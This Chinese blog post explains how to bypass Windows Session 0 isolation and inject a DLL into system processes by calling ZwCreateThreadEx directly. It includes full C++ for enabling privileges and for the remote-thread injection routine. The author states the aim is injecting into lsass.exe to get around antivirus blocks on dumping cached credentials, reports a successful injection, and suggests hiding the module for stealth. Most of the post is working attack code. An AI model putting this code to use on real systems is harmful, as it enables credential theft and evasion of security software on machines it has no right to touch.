前言
之前已经提到过,远线程注入和内存写入隐藏模块,今天介绍突破session 0的dll注入
其实今天写这个的主要原因就是看到倾旋大佬有篇文章提到:有些反病毒引擎限制从lsass中dump出缓存,可以通过注入lsass
看大佬的博客真的可以学到很多哈哈
编译环境
win10 vs2019
什么是session 0
在Windows XP,Windows Server 2003以及更早的版本中,第一个登录的用户以及Windows的所有服务都运行在Session 0上。
这样做危险的地方是,用户使用的应用程序可能会利用Windows的服务程序提升自己的权限。
后续版本的windows,普通应用程序已经不再session 0中运行
思路
由于SESSION 0隔离机制,导致传统远程线程注入系统服务进程失败。和传统的 CreateRemoteThread 函数实现的远线程注入 DLL 的唯一一个区别就是,我们调用的是更为底层的ZwCreateThreadEx来创建线程,
虽然CreateRemoteThread 函数到底层也是调用ZwCreateThreadEx,但在调用ZwCreateThreadEx时 ,ZwCreateThreadEx的第7个参数 CreateSuspended(CreateThreadFlags)的值始终为1,它会导致线程创建完成后一直挂起无法恢复运行,于是我们选择直接调用ZwCreateThreadEx,将第7个参数直接置为0,这样可达到注入目的
实现过程
先创建一个dll
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: { MessageBox(NULL, L"远程线程注入成功!", L"提示", NULL); break; } case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }
这里有一个坑:如果要注入系统进程的话,创建的dll一定要是64位的,这与当前的操作系统有关,后面编译exe的时候也一定要是64位的,这个更当前exe多少位有关
这是我的操作系统版本
编写程序
提升当前进程的权限
1 BOOL EnbalePrivileges(HANDLE hProcess, LPCWSTR pszPrivilegesName) 2 { 3 HANDLE hToken = NULL; 4 LUID luidValue = { 0 }; 5 TOKEN_PRIVILEGES tokenPrivileges = { 0 }; 6 BOOL bRet = FALSE; 7 DWORD dwRet = 0; 8 // 打开进程令牌并获取进程令牌句柄 9 bRet = ::OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES, &hToken); 10 if (FALSE == bRet) 11 { 12 printf("OpenProcessToken"); 13 return FALSE; 14 } 15 // 获取本地系统的 pszPrivilegesName 特权的LUID值 16 bRet = ::LookupPrivilegeValue(NULL, pszPrivilegesName, &luidValue); 17 if (FALSE == bRet) 18 { 19 printf("LookupPrivilegeValue"); 20 return FALSE; 21 } 22 // 设置提升权限信息 23 tokenPrivileges.PrivilegeCount = 1; 24 tokenPrivileges.Privileges[0].Luid = luidValue; 25 tokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 26 // 提升进程令牌访问权限 27 bRet = ::AdjustTokenPrivileges(hToken, FALSE, &tokenPrivileges, 0, NULL, NULL); 28 if (FALSE == bRet) 29 { 30 printf("AdjustTokenPrivileges"); 31 return FALSE; 32 } 33 else 34 { 35 // 根据错误码判断是否特权都设置成功 36 dwRet = ::GetLastError(); 37 if (ERROR_SUCCESS == dwRet) 38 { 39 return TRUE; 40 } 41 else if (ERROR_NOT_ALL_ASSIGNED == dwRet) 42 { 43 printf("ERROR_NOT_ALL_ASSIGNED"); 44 return FALSE; 45 } 46 } 47 return FALSE; 48 }
这里参考了 https://www.write-bug.com/article/2012.html
这个师傅对函数中三个API都有介绍
ZwCreateThreadEx
ZwCreateThreadEx 在 ntdll.dll 中并没有声明,所以我们需要使用 GetProcAddress 从 ntdll.dll 中获取该函数的导出地址。
在64位和32位中,函数定义还不一样
64位中
1 DWORD WINAPI ZwCreateThreadEx( 2 PHANDLE ThreadHandle, 3 ACCESS_MASK DesiredAccess, 4 LPVOID ObjectAttributes, 5 HANDLE ProcessHandle, 6 LPTHREAD_START_ROUTINE lpStartAddress, 7 LPVOID lpParameter, 8 ULONG CreateThreadFlags, 9 SIZE_T ZeroBits, 10 SIZE_T StackSize, 11 SIZE_T MaximumStackSize, 12 LPVOID pUnkown);
32位中
1 DWORD WINAPI ZwCreateThreadEx( 2 PHANDLE ThreadHandle, 3 ACCESS_MASK DesiredAccess, 4 LPVOID ObjectAttributes, 5 HANDLE ProcessHandle, 6 LPTHREAD_START_ROUTINE lpStartAddress, 7 LPVOID lpParameter, 8 BOOL CreateSuspended, 9 DWORD dwStackSize, 10 DWORD dw1, 11 DWORD dw2, 12 LPVOID pUnkown);
大体思路更之前dll注入差不多,知识更改CreateRemoteThread 为ZwCreateThreadEx
核心代码
1 DWORD _InjectSysThread(DWORD _Pid, LPCWSTR psDllFillName) 2 { 3 //打开进程 4 HANDLE hprocess; 5 HANDLE hThread; 6 DWORD _SIZE = 0; 7 LPVOID pAlloc = NULL; 8 DWORD psDllAddr = 0; 9 FARPROC pThreadFunction; 10 DWORD ZwRet = 0; 11 hprocess = ::OpenProcess(PROCESS_ALL_ACCESS, FALSE, _Pid); 12 //在注入进程中写入Loadlibrary名称 13 _SIZE = (_tcslen(psDllFillName) + 1) * sizeof(TCHAR); 14 pAlloc = ::VirtualAllocEx(hprocess, NULL, _SIZE, MEM_COMMIT, PAGE_READWRITE); 15 if (pAlloc == NULL) 16 { 17 printf("VirtualAllocExERROR"); 18 return FALSE; 19 } 20 BOOL x = ::WriteProcessMemory(hprocess, pAlloc, psDllFillName, _SIZE, NULL); 21 if (FALSE == x) 22 { 23 printf("WriteProcessMemoryERROR"); 24 return FALSE; 25 } 26 27 HMODULE hNtdll = LoadLibrary(L"ntdll.dll"); 28 if (hNtdll == NULL) 29 { 30 printf("LoadLibraryERROR"); 31 return FALSE; 32 } 33 34 pThreadFunction = ::GetProcAddress(::GetModuleHandle(L"kernel32.dll"), "LoadLibraryW"); 35 36 #ifdef _WIN64 37 typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)( 38 PHANDLE ThreadHandle, 39 ACCESS_MASK DesiredAccess, 40 LPVOID ObjectAttributes, 41 HANDLE ProcessHandle, 42 LPTHREAD_START_ROUTINE lpStartAddress, 43 LPVOID lpParameter, 44 ULONG CreateThreadFlags, 45 SIZE_T ZeroBits, 46 SIZE_T StackSize, 47 SIZE_T MaximumStackSize, 48 LPVOID pUnkown 49 ); 50 #else 51 typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)( 52 PHANDLE ThreadHandle, 53 ACCESS_MASK DesiredAccess, 54 LPVOID ObjectAttributes, 55 HANDLE ProcessHandle, 56 LPTHREAD_START_ROUTINE lpStartAddress, 57 LPVOID lpParameter, 58 BOOL CreateSuspended, 59 DWORD dwStackSize, 60 DWORD dw1, 61 DWORD dw2, 62 LPVOID pUnkown 63 ); 64 #endif 65 typedef_ZwCreateThreadEx ZwCreateThreadEx = NULL; 66 ZwCreateThreadEx = (typedef_ZwCreateThreadEx)::GetProcAddress(hNtdll, "ZwCreateThreadEx"); 67 68 if (ZwCreateThreadEx == NULL) 69 { 70 printf("ZwCreateThreadExERROR"); 71 return FALSE; 72 } 73 HANDLE hRemoteThread; 74 ZwRet = ZwCreateThreadEx(&hRemoteThread, PROCESS_ALL_ACCESS, NULL, hprocess, 75 (LPTHREAD_START_ROUTINE)pThreadFunction, pAlloc, 0, 0, 0, 0, NULL); 76 77 if (NULL == hRemoteThread) 78 { 79 printf("创建线程失败"); 80 CloseHandle(hprocess); 81 return FALSE; 82 } 83 WaitForSingleObject(hRemoteThread, -1); 84 VirtualFreeEx(hprocess, pAlloc, 0, MEM_RELEASE); 85 CloseHandle(hRemoteThread); 86 CloseHandle(hprocess); 87 FreeLibrary(hNtdll); 88 return TRUE; 89 }
执行结果
这里我选择的是explorer.exe
注入lsass.exe ,只不过注入这类程序不会弹窗,但我们不需要弹窗嘛(滑稽)
记得使用Procexp的时候管理员运行,要不然系统进程模块看不到
但是像这种进程csrss.exe
遍历不出来,我看到网上有个师傅说这个进程好像需要更高的权限去访问,注入的话也需要其他操作,应该是牵扯到0环层面了,小弟对0 环内核层并不熟悉,就写到这里,基本目标还是达成了
其实还可以内存写入,隐藏模块,更加隐蔽
如果提权运行报错的话,记得以管理员身份运行就好了
参考
https://www.write-bug.com/article/2013.html
https://idiotc4t.com/code-and-dll-process-injection/bypass-session-0-injection